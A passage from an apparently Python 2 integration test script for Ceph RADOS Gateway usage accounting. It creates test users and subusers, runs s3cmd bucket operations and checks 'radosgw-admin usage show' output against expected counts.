result4 = verify_show_based_on_version('radosgw-admin usage show --uid=user2 --subuser=subu01', expect_dict16)
os.chdir(py_dir)
if result1 == result2 == result3 == result4 == True:
print "testcase15 %s" % (ok_display("OK"))
else:
print "testcase15 %s" % (fail_display("FAIL"))
else:
print "testcase15 %s" % (fail_display("FAIL"))
else:
print "testcase15 %s" % (fail_display("FAIL"))
else:
print "testcase15 %s" % (fail_display("FAIL"))
class TestCase16(object):
def op1(self):
exec_command('s3cmd -c user1.s3cfg del s3://test1/user1.s3cfg')
exec_command('s3cmd -c user1.s3cfg rb s3://test1')
time.sleep(30)
def op2(self):
exec_command('s3cmd -c subuser1.s3cfg del s3://test2/subuser1.s3cfg')
exec_command('s3cmd -c subuser1.s3cfg rb s3://test2')
time.sleep(30)
def op3(self):
exec_command('s3cmd -c user2.s3cfg del s3://test01/user2.s3cfg')
exec_command('s3cmd -c user2.s3cfg rb s3://test01')
time.sleep(30)
def op4(self):
exec_command('s3cmd -c subu01.s3cfg del s3://test02/subu01.s3cfg')
exec_command('s3cmd -c subu01.s3cfg rb s3://test02')
time.sleep(30)
def clean(self):
os.chdir(ceph_path)
exec_based_on_version('radosgw-admin usage trim --uid=user1')
exec_based_on_version('radosgw-admin user rm --uid=user1 --purge-data --purge-keys')
exec_based_on_version('radosgw-admin usage trim --uid=user2')
exec_based_on_version('radosgw-admin user rm --uid=user2 --purge-data --purge-keys')
os.chdir(py_dir)
exec_command('rm 14*.txt')
def run(self):
result1 = result2 = result3 = result4 = False
self.op1()
expect_dict1 = {"entries_size": 1,
"user1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 1, "successful_ops": 1},
"list_bucket": {"ops": 1, "successful_ops": 1},
"delete_obj": {"ops": 1, "successful_ops": 1},
"delete_bucket": {"ops": 1, "successful_ops": 1}}},
"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 1, "successful_ops": 1},
"list_bucket": {"ops": 1, "successful_ops": 1}}}}}
expect_dict2 = {"entries_size": 1,
"user1:subuser1": {"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 1, "successful_ops": 1},
"list_bucket": {"ops": 1, "successful_ops": 1}}}}}
expect_dict3 = {"entries_size": 1,
"user2": {"test01": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 1, "successful_ops": 1},
"list_bucket": {"ops": 1, "successful_ops": 1}}},
"test02": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 1, "successful_ops": 1},
"list_bucket": {"ops": 1, "successful_ops": 1}}}}}
expect_dict4 = {"entries_size": 1,
"user2:subu01": {"test02": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 1, "successful_ops": 1},
"list_bucket": {"ops": 1, "successful_ops": 1}}}}}
os.chdir(ceph_path)
result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict1)
result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict2)
result3 = verify_show_based_on_version('radosgw-admin usage show --uid=user2', expect_dict3)
result4 = verify_show_based_on_version('radosgw-admin usage show --uid=user2 --subuser=subu01', expect_dict4)
os.chdir(py_dir)
if result1 == result2 == result3 == result4 == True:
self.op2()
expect_dict5 = {"entries_size": 1,
"user1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 1, "successful_ops": 1},
"list_bucket": {"ops": 1, "successful_ops": 1},
"delete_obj": {"ops": 1, "successful_ops": 1},
"delete_bucket": {"ops": 1, "successful_ops": 1}}},
"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 1, "successful_ops": 1},
"list_bucket": {"ops": 1, "successful_ops": 1},
"delete_obj": {"ops": 1, "successful_ops": 1},
"delete_bucket": {"ops": 1, "successful_ops": 1}}}}}
expect_dict6 = {"entries_size": 1,
"user1:subuser1": {"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 1, "successful_ops": 1},
"list_bucket": {"ops": 1, "successful_ops": 1},
"delete_obj": {"ops": 1, "successful_ops": 1},
"delete_bucket": {"ops": 1, "successful_ops": 1}}}}}
expect_dict7 = expect_dict3
expect_dict8 = expect_dict4
os.chdir(ceph_path)
result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict5)
result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict6)
result3 = verify_show_based_on_version('radosgw-admin usage show --uid=user2', expect_dict7)
result4 = verify_show_based_on_version('radosgw-admin usage show --uid=user2 --subuser=subu01', expect_dict8)
os.chdir(py_dir)
if result1 == result2 == result3 == result4 == True:
self.op3()
expect_dict9 = expect_dict5
expect_dict10 = expect_dict6
expect_dict11 = {"entries_size": 1,
"user2": {"test01": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 1, "successful_ops": 1},
"list_bucket": {"ops": 1, "successful_ops": 1},
"delete_obj": {"ops": 1, "successful_ops": 1},
"delete_bucket": {"ops": 1, "successful_ops": 1}}},
"test02": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 1, "successful_ops": 1},
"list_bucket": {"ops": 1, "successful_ops": 1}}}}}
expect_dict12 = expect_dict8
os.chdir(ceph_path)
result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict9)
result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict10)
result3 = verify_show_based_on_version('radosgw-admin usage show --uid=user2', expect_dict11)
result4 = verify_show_based_on_version('radosgw-admin usage show --uid=user2 --subuser=subu01', expect_dict12)
os.chdir(py_dir)
if result1 == result2 == result3 == result4 == True:
self.op4()
expect_dict13 = expect_dict9
expect_dict14 = expect_dict10
expect_dict15 = {"entries_size": 1,
"user2": {"test01": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 1, "successful_ops": 1},
"list_bucket": {"ops": 1, "successful_ops": 1},
"delete_obj": {"ops": 1, "successful_ops": 1},
"delete_bucket": {"ops": 1, "successful_ops": 1}}},
"test02": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 1, "successful_ops": 1},
"list_bucket": {"ops": 1, "successful_ops": 1},
"delete_obj": {"ops": 1, "successful_ops": 1},
"delete_bucket": {"ops": 1, "successful_ops": 1}}}}}
expect_dict16 = {"entries_size": 1,
"user2:subu01": {"test02": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 1, "successful_ops": 1},
"list_bucket": {"ops": 1, "successful_ops": 1},
"delete_obj": {"ops": 1, "successful_ops": 1},
"delete_bucket": {"ops": 1, "successful_ops": 1}}}}}
os.chdir(ceph_path)
result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict13)
result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict14)
result3 = verify_show_based_on_version('radosgw-admin usage show --uid=user2', expect_dict15)
result4 = verify_show_based_on_version('radosgw-admin usage show --uid=user2 --subuser=subu01', expect_dict16)
os.chdir(py_dir)
if result1 == result2 == result3 == result4 == True:
print "testcase16 %s" % (ok_display("OK"))
else:
print "testcase16 %s" % (fail_display("FAIL"))
else:
print "testcase16 %s" % (fail_display("FAIL"))
else:
print "testcase16 %s" % (fail_display("FAIL"))
else:
print "testcase16 %s" % (fail_display("FAIL"))
self.clean()
class TestCase17(object):
def prepare(self):
os.chdir(ceph_path)
exec_based_on_version('radosgw-admin user create --uid=user1 --access-key=user1 --secret-key=user1 --display-name="user1"')
exec_based_on_version('radosgw-admin subuser create --key-type=s3 --uid=user1 --subuser=subuser1 --access=full --access-key=subuser1 --secret-key=subuser1')
exec_based_on_version('radosgw-admin subuser create --key-type=s3 --uid=user1 --subuser=subuser2 --access=full --access-key=subuser2 --secret-key=subuser2')
os.chdir(py_dir)
def op1(self):
exec_command('s3cmd -c user1.s3cfg mb s3://test1')
exec_command('s3cmd -c subuser1.s3cfg put user1.s3cfg s3://test1')
exec_command('s3cmd -c subuser2.s3cfg mb s3://test2')
time.sleep(30)
def op2(self):
os.chdir(ceph_path)
exec_based_on_version('radosgw-admin subuser rm --uid=user1 --subuser=subuser1')
os.chdir(py_dir)
def op3(self):
os.chdir(ceph_path)
exec_based_on_version('radosgw-admin subuser rm --uid=user1 --subuser=subuser2')
os.chdir(py_dir)
def run(self):
expect_dict1 = {"entries_size": 1,
"user1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1}}},
"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1}}}}}
expect_dict2 = {"entries_size": 1,
"user1:subuser1": {"test1": {"categories": {"put_obj": {"ops": 1, "successful_ops": 1}}}}}
expect_dict3 = {"entries_size": 1,
"user1:subuser2": {"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1}}}}}
self.prepare()
self.op1()
result1 = result2 = result3 = False
os.chdir(ceph_path)
result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict1)
result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict2)
result3 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser2', expect_dict3)
os.chdir(py_dir)
if result1 == result2 == result3 == True:
self.op2()
expect_dict4 = expect_dict1
expect_dict5 = expect_dict3
os.chdir(ceph_path)
result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict4)
result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser2', expect_dict5)
os.chdir(py_dir)
if result1 == result2 == True:
self.op3()
expect_dict6 = expect_dict4
os.chdir(ceph_path)
result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict6)
os.chdir(py_dir)
if result1 == True:
print "testcase17 %s" % (ok_display("OK"))
else:
print "testcase17 %s" % (fail_display("FAIL"))
else:
print "testcase17 %s" % (fail_display("FAIL"))
else:
print "testcase17 %s" % (fail_display("FAIL"))
self.clean()
def clean(self):
exec_command('s3cmd -c user1.s3cfg rb s3://test1 --recursive')
exec_command('s3cmd -c user1.s3cfg rb s3://test2')
time.sleep(30)
os.chdir(ceph_path)
exec_based_on_version('radosgw-admin usage trim --uid=user1')
exec_based_on_version('radosgw-admin user rm --uid=user1 --purge-data --purge-keys')
os.chdir(py_dir)
class TestCase18(object):
def prepare(self):
os.chdir(ceph_path)
exec_based_on_version('radosgw-admin user create --uid=user1 --access-key=user1 --secret-key=user1 --display-name="user1"')
exec_based_on_version('radosgw-admin user create --uid=user2 --access-key=user2 --secret-key=user2 --display-name="user2"')
subuser_id = ''
command = ''
for i in range(1, 1001):
subuser_id = 'subuser%d' % (i)
command = 'radosgw-admin subuser create --key-type=s3 --uid=user1 --subuser={subuser} --access=full --access-key={subuser} --secret-key={subuser}'.format(subuser = subuser_id)
exec_based_on_version(command)
os.chdir(py_dir)
def op1(self):
exec_command('s3cmd -c user1.s3cfg mb s3://test1')
time.sleep(30)
def op2(self):
exec_command('s3cmd -c subuser1.s3cfg mb s3://test2')
time.sleep(30)
def op3(self):
exec_command('s3cmd -c subuser666.s3cfg put user1.s3cfg s3://test2')
time.sleep(30)
def op4(self):
exec_command('s3cmd -c user2.s3cfg mb s3://test3')
time.sleep(30)
def clean(self):
exec_command('s3cmd -c user1.s3cfg rb s3://test1')
exec_command('s3cmd -c user1.s3cfg rb s3://test2 --recursive')
exec_command('s3cmd -c user2.s3cfg rb s3://test3')
time.sleep(30)
os.chdir(ceph_path)
exec_based_on_version('radosgw-admin usage trim --uid=user1')
exec_based_on_version('radosgw-admin usage trim --uid=user2')
exec_based_on_version('radosgw-admin user rm --uid=user1 --purge-data --purge-keys')
exec_based_on_version('radosgw-admin user rm --uid=user2 --purge-data --purge-keys')
os.chdir(py_dir)
def run(self):
result1 = result2 = result3 = result4 = False
self.prepare()
self.op1()
expect_dict1 = {"entries_size": 1,
"user1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1}}}}}
expect_dict2 = {"entries_size": 0}
os.chdir(ceph_path)
result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict1)
result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user2', expect_dict2)
subuser_id = ''
command = ''
for i in range(1, 1001):
subuser_id = 'subuser%d' % (i)
command = 'radosgw-admin usage show --uid=user1 --subuser={subuser}'.format(subuser = subuser_id)
result3 = verify_show_based_on_version(command, expect_dict2)
if result3 == False:
break
os.chdir(py_dir)
if result1 == result2 == result3 == True:
self.op2()
expect_dict3 = {"entries_size": 1,
"user1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1}}},
"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1}}}}}
expect_dict4 = {"entries_size": 1,
"user1:subuser1": {"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1}}}}}
expect_dict5 = expect_dict2
os.chdir(ceph_path)
result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict3)
result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user2', expect_dict5)
for i in range(1, 1001):
if i == 1:
result3 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict4)
else:
subuser_id = 'subuser%d' % (i)
command = 'radosgw-admin usage show --uid=user1 --subuser={subuser}'.format(subuser = subuser_id)
result3 = verify_show_based_on_version(command, expect_dict5)
if result3 == False:
break
os.chdir(py_dir)
if result1 == result2 == result3 == True:
self.op3()
expect_dict6 = {"entries_size": 1,
"user1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1}}},
"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1}}}}}
expect_dict7 = expect_dict4
expect_dict8 = {"entries_size": 1,
"user1:subuser666": {"test2": {"categories": {"put_obj": {"ops": 1, "successful_ops": 1}}}}}
expect_dict9 = expect_dict5
os.chdir(ceph_path)
result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict6)
result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user2', expect_dict9)
for i in range(1, 1001):
subuser_id = 'subuser%d' % (i)
command = 'radosgw-admin usage show --uid=user1 --subuser={subuser}'.format(subuser = subuser_id)
if i == 1:
result3 = verify_show_based_on_version(command, expect_dict7)
elif i == 666:
result3 = verify_show_based_on_version(command, expect_dict8)
else:
result3 = verify_show_based_on_version(command, expect_dict9)
if result3 == False:
break
os.chdir(py_dir)
if result1 == result2 == result3 == True:
self.op4()
expect_dict10 = expect_dict6
expect_dict11 = expect_dict7
expect_dict12 = expect_dict8
expect_dict13 = {"entries_size": 1,
"user2": {"test3": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1}}}}}
expect_dict14 = expect_dict9
os.chdir(ceph_path)
result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict10)
result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user2', expect_dict13)
for i in range(1, 1001):
subuser_id = 'subuser%d' % (i)
command = 'radosgw-admin usage show --uid=user1 --subuser={subuser}'.format(subuser = subuser_id)
if i == 1:
result3 = verify_show_based_on_version(command, expect_dict11)
elif i == 666:
result3 = verify_show_based_on_version(command, expect_dict12)
else:
result3 = verify_show_based_on_version(command, expect_dict14)
if result3 == False:
break
os.chdir(py_dir)
if result1 == result2 == result3 == True:
print "testcase18 %s" % (ok_display("OK"))
else:
print "testcase18 %s" % (fail_display("FAIL"))
else:
print "testcase18 %s" % (fail_display("FAIL"))
else:
print "testcase18 %s" % (fail_display("FAIL"))
else:
print "testcase18 %s" % (fail_display("FAIL"))
self.clean()
class TestCase19(object):
def prepare(self):
os.chdir(ceph_path)
exec_based_on_version('radosgw-admin user create --uid=user1 --access-key=user1 --secret-key=user1 --display-name="user1"')
exec_based_on_version('radosgw-admin subuser create --key-type=s3 --uid=user1 --subuser=subuser1 --access=full --access-key=subuser1 --secret-key=subuser1')
exec_based_on_version('radosgw-admin subuser create --key-type=s3 --uid=user1 --subuser=subuser2 --access=full --access-key=subuser2 --secret-key=subuser2')
os.chdir(py_dir)
exec_command('s3cmd -c user1.s3cfg mb s3://test1')
exec_command('s3cmd -c subuser1.s3cfg put user1.s3cfg s3://test1')
exec_command('s3cmd -c subuser2.s3cfg mb s3://test2')
time.sleep(30)
def run(self):
expect_dict1 = {"entries_size": 1,
"user1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1}}},
"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1}}}}}
expect_dict2 = {"entries_size": 1,
"user1:subuser1": {"test1": {"categories": {"put_obj": {"ops": 1, "successful_ops": 1}}}}}
expect_dict3 = {"entries_size": 1,
"user1:subuser2": {"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1}}}}}
self.prepare()
result1 = result2 = result3 = False
os.chdir(ceph_path)
result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict1)
result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict2)
result3 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser2', expect_dict3)
os.chdir(py_dir)
if result1 == result2 == result3 == True:
expect_dict4 = {"entries_size": 1,
"user1": {"test1": {"categories": {"put_obj": {"ops": 1, "successful_ops": 1}}},
"test2": {"categories": {}}}}
expect_dict5 = {"entries_size": 1,
"user1:subuser1": {"test1": {"categories": {"put_obj": {"ops": 1, "successful_ops": 1}}}}}
expect_dict6 = {"entries_size": 1,
"user1:subuser2": {"test2": {"categories": {}}}}
os.chdir(ceph_path)
result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --categories=put_obj', expect_dict4)
result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1 --categories=put_obj', expect_dict5)
result3 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser2 --categories=put_obj', expect_dict6)
os.chdir(py_dir)
if result1 == result2 == result3 == True:
expect_dict7 = {"entries_size": 1,
"user1": {"test1": {"categories": {}},
"test2": {"categories": {}}}}
expect_dict8 = {"entries_size": 1,
"user1:subuser1": {"test1": {"categories": {}}}}
expect_dict9 = {"entries_size": 1,
"user1:subuser2": {"test2": {"categories": {}}}}
os.chdir(ceph_path)
result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --categories=list_bucket', expect_dict7)
result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1 --categories=list_bucket', expect_dict8)
result3 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser2 --categories=list_bucket', expect_dict9)
os.chdir(py_dir)
if result1 == result2 == result3 == True:
print "testcase19 %s" % (ok_display("OK"))
else:
print "testcase19 %s" % (fail_display("FAIL"))
else:
print "testcase19 %s" % (fail_display("FAIL"))
else:
print "testcase19 %s" % (fail_display("FAIL"))
self.clean()
def clean(self):
exec_command('s3cmd -c user1.s3cfg rb s3://test1 --recursive')
exec_command('s3cmd -c subuser2.s3cfg rb s3://test2')
time.sleep(30)
os.chdir(ceph_path)
exec_based_on_version('radosgw-admin usage trim --uid=user1')
exec_based_on_version('radosgw-admin user rm --uid=user1 --purge-data --purge-keys')
os.chdir(py_dir)
class TestCase20(object):
def prepare(self):
os.chdir(ceph_path)
exec_based_on_version('radosgw-admin user create --uid=user1 --access-key=user1 --secret-key=user1 --display-name="user1"')
exec_based_on_version('radosgw-admin subuser create --key-type=s3 --uid=user1 --subuser=subuser1 --access=full --access-key=subuser1 --secret-key=subuser1')
exec_based_on_version('radosgw-admin subuser create --key-type=s3 --uid=user1 --subuser=subuser2 --access=full --access-key=subuser2 --secret-key=subuser2')
os.chdir(py_dir)
def op1(self):
exec_command('s3cmd -c user1.s3cfg mb s3://test1')
exec_command('s3cmd -c subuser1.s3cfg put user1.s3cfg s3://test1')
exec_command('s3cmd -c subuser2.s3cfg mb s3://test2')
time.sleep(30)
def op2(self):
os.chdir(ceph_path)
exec_based_on_version('radosgw-admin subuser rm --uid=user1 --subuser=subuser1')
os.chdir(py_dir)
def op3(self):
os.chdir(ceph_path)
exec_based_on_version('radosgw-admin subuser rm --uid=user1 --subuser=subuser2')
os.chdir(py_dir)
def op4(self):
os.chdir(ceph_path)
exec_based_on_version('radosgw-admin subuser create --key-type=s3 --uid=user1 --subuser=subuser1 --access=full --access-key=subuser1 --secret-key=subuser1')
os.chdir(py_dir)
def op5(self):
os.chdir(ceph_path)
exec_based_on_version('radosgw-admin user rm --uid=user1 --purge-data --purge-keys')
os.chdir(py_dir)
def op6(self):
os.chdir(ceph_path)
exec_based_on_version('radosgw-admin user create --uid=user1 --access-key=user1 --secret-key=user1 --display-name="user1"')
os.chdir(py_dir)
def run(self):
expect_dict1 = {"entries_size": 1,
"user1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1}}},
"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1}}}}}
expect_dict2 = {"entries_size": 1,
"user1:subuser1": {"test1": {"categories": {"put_obj": {"ops": 1, "successful_ops": 1}}}}}
expect_dict3 = {"entries_size": 1,
"user1:subuser2": {"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1}}}}}
self.prepare()
self.op1()
result1 = result2 = result3 = False
os.chdir(ceph_path)
result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict1)
result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict2)
result3 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser2', expect_dict3)
os.chdir(py_dir)
if result1 == result2 == result3 == True:
self.op2()
expect_dict4 = expect_dict1
expect_dict5 = expect_dict2
expect_dict6 = expect_dict3
os.chdir(ceph_path)
result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict4)
result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict5)
result3 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser2', expect_dict6)
os.chdir(py_dir)
if result1 == result2 == result3 == True:
self.op3()
expect_dict7 = expect_dict4
expect_dict8 = expect_dict5
expect_dict9 = expect_dict6
os.chdir(ceph_path)
result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict7)
result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict8)
result3 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser2', expect_dict9)
os.chdir(py_dir)
if result1 == result2 == result3 == True:
self.op4()
expect_dict10 = expect_dict7
expect_dict11 = expect_dict8
expect_dict12 = expect_dict9
os.chdir(ceph_path)
result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict10)
result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict11)
result3 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser2', expect_dict12)
os.chdir(py_dir)
if result1 == result2 == result3 == True:
self.op5()
expect_dict13 = expect_dict10
expect_dict14 = expect_dict11
expect_dict15 = expect_dict12
os.chdir(ceph_path)
result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict13)
result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict14)
result3 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser2', expect_dict15)
os.chdir(py_dir)
if result1 == result2 == result3 == True:
self.op6()
expect_dict16 = expect_dict13
expect_dict17 = expect_dict14
expect_dict18 = expect_dict15
os.chdir(ceph_path)
result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict16)
result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict17)
result3 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser2', expect_dict18)
os.chdir(py_dir)
if result1 == result2 == result3 == True:
print "testcase20 %s" % (ok_display("OK"))
else:
print "testcase20 %s" % (fail_display("FAIL"))
else:
print "testcase20 %s" % (fail_display("FAIL"))
else:
print "testcase20 %s" % (fail_display("FAIL"))
else:
print "testcase20 %s" % (fail_display("FAIL"))
else:
print "testcase20 %s" % (fail_display("FAIL"))
else:
print "testcase20 %s" % (fail_display("FAIL"))
self.clean()
def clean(self):
exec_command('s3cmd -c user1.s3cfg rb s3://test1 --recursive')
exec_command('s3cmd -c user1.s3cfg rb s3://test2')
time.sleep(30)
os.chdir(ceph_path)
exec_based_on_version('radosgw-admin usage trim --uid=user1')
exec_based_on_version('radosgw-admin user rm --uid=user1 --purge-data --purge-keys')
os.chdir(py_dir)
class TestCase21(object):
def prepare(self):
os.chdir(ceph_path)
exec_based_on_version('radosgw-admin user create --uid=user1 --access-key=user1 --secret-key=user1 --display-name="user1"')
exec_based_on_version('radosgw-admin subuser create --key-type=s3 --uid=user1 --subuser=subuser1 --access=full --access-key=subuser1 --secret-key=subuser1')
exec_based_on_version('radosgw-admin subuser create --key-type=s3 --uid=user1 --subuser=subuser2 --access=full --access-key=subuser2 --secret-key=subuser2')
exec_based_on_version('radosgw-admin user create --uid=user2 --access-key=user2 --secret-key=user2 --display-name="user2"')
os.chdir(py_dir)
def op1(self):
exec_command('s3cmd -c user1.s3cfg mb s3://test1')
exec_command('s3cmd -c subuser1.s3cfg put user1.s3cfg s3://test1')
exec_command('s3cmd -c subuser2.s3cfg mb s3://test2')
exec_command('s3cmd -c user2.s3cfg mb s3://test01')
exec_command('s3cmd -c user2.s3cfg put user2.s3cfg s3://test01')
time.sleep(30)
def op2(self):
exec_command('s3cmd -c user1.s3cfg setacl s3://test1 --acl-grant=write:user2')
exec_command('s3cmd -c user2.s3cfg put user2.s3cfg s3://test1')
time.sleep(30)
def op3(self):
exec_command('s3cmd -c user1.s3cfg rb s3://test1 --recursive')
time.sleep(30)
def clean(self):
exec_command('s3cmd -c user1.s3cfg rb s3://test2')
exec_command('s3cmd -c user2.s3cfg rb s3://test01 --recursive')
time.sleep(30)
os.chdir(ceph_path)
exec_based_on_version('radosgw-admin usage trim --uid=user1')
exec_based_on_version('radosgw-admin usage trim --uid=user2')
exec_based_on_version('radosgw-admin user rm --uid=user1 --purge-data --purge-keys')
exec_based_on_version('radosgw-admin user rm --uid=user2 --purge-data --purge-keys')
os.chdir(py_dir)
def run(self):
result1 = result2 = result3 = result4 = False
self.prepare()
self.op1()
expect_dict1 = {"entries_size": 1,
"user1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1}}},
"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1}}}}}
expect_dict2 = {"entries_size": 1,
"user1:subuser1": {"test1": {"categories": {"put_obj": {"ops": 1, "successful_ops": 1}}}}}
expect_dict3 = {"entries_size": 1,
"user1:subuser2": {"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1}}}}}
expect_dict4 = {"entries_size": 1,
"user2": {"test01": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1}}}}}
os.chdir(ceph_path)
result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict1)
result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict2)
result3 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser2', expect_dict3)
result4 = verify_show_based_on_version('radosgw-admin usage show --uid=user2', expect_dict4)
os.chdir(py_dir)
if result1 == result2 == result3 == result4 == True:
self.op2()
expect_dict5 = {"entries_size": 1,
"user1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 2, "successful_ops": 2},
"put_acls": {"ops": 1, "successful_ops": 1},
"get_acls": {"ops": 1, "successful_ops": 1}}},
"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1}}}}}
expect_dict6 = expect_dict2
expect_dict7 = expect_dict3
expect_dict8 = {"entries_size": 1,
"user2": {"test01": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1}}}}}
os.chdir(ceph_path)
result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict5)
result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict6)
result3 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser2', expect_dict7)
result4 = verify_show_based_on_version('radosgw-admin usage show --uid=user2', expect_dict8)
os.chdir(py_dir)
if result1 == result2 == result3 == result4 == True:
self.op3()
